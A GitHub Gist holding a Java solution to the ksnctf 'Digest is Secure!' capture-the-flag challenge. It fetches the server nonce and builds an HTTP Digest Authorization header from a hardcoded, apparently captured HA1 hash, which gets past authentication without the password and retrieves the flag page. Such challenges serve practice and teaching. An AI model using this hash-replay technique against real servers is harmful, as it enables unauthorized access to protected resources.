Created
November 22, 2016 06:37
-
-
Save habitaso/814978a4ff913202a74889a2aa5f0399 to your computer and use it in GitHub Desktop.
CTF-Digest is Secure!!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.IOException; | |
import java.io.InputStream; | |
import java.net.HttpURLConnection; | |
import java.net.URL; | |
import java.util.Map; | |
import org.apache.commons.codec.digest.DigestUtils; | |
public class Main { | |
public static void main(String [] args) throws IOException{ | |
String user = "q9"; | |
String realm= "secret"; | |
String uri = "/~q9/flag.html"; | |
String method="GET"; | |
String hasha1 = "c627e19450db746b739f41b64097d449"; | |
String a2 = method +":"+ uri; | |
String nc ="00000001"; | |
String cnonce ="9691c249745d94fc"; | |
String qop = "auth"; | |
//サーバにリクエストを送信 | |
URL url = new URL("http://ksnctf.sweetduet.info:10080"+uri); | |
HttpURLConnection connection = (HttpURLConnection)url.openConnection(); | |
//レスポンスを受信 | |
Map<String, java.util.List<String>> map = connection.getHeaderFields(); | |
//レスポンスからnoneを取り出す。 | |
String nonce = getNonce(map); | |
//Hashの再計算 | |
//A1の計算 | |
String hasha2 = MD5(a2);//method:uri | |
//Responseの計算 | |
String hx_response = MD5(hasha1+":"+nonce+":"+nc+":"+cnonce+":"+qop+":"+hasha2); | |
//認証情報を指定してHTTPアクセス | |
connection = (HttpURLConnection)url.openConnection(); | |
connection.setRequestMethod("GET"); | |
connection.setRequestProperty("Authorization","Digest username="+user+", realm="+realm+", nonce="+nonce+", uri="+uri+", algorithm=MD5, response="+hx_response+", qop=auth, nc=00000001, cnonce="+cnonce ); | |
connection.connect(); | |
//結果の出力 | |
InputStream in = connection.getInputStream(); | |
byte bodyByte[] = new byte[1024]; | |
while(in.read(bodyByte)!=-1){ | |
System.out.println(new String(bodyByte)); | |
} | |
} | |
public static String MD5(String string ){ | |
//MD5ハッシュの生成 | |
return DigestUtils.md5Hex(string); | |
} | |
public static String getNonce(Map<String,java.util.List<String>> map){ | |
/** | |
* HTTPレスポンス401よりnonceを取り出す | |
*/ | |
String noncekey=""; | |
java.util.List<String> h = (java.util.List<String>) map.get("WWW-Authenticate"); | |
String auth = h.get(0); | |
String [] authar = auth.split(","); | |
authar = authar[1].split("\""); | |
noncekey = authar[1]; | |
System.out.println("nonce:"+authar[1]);//取得したnonce | |
return noncekey; | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment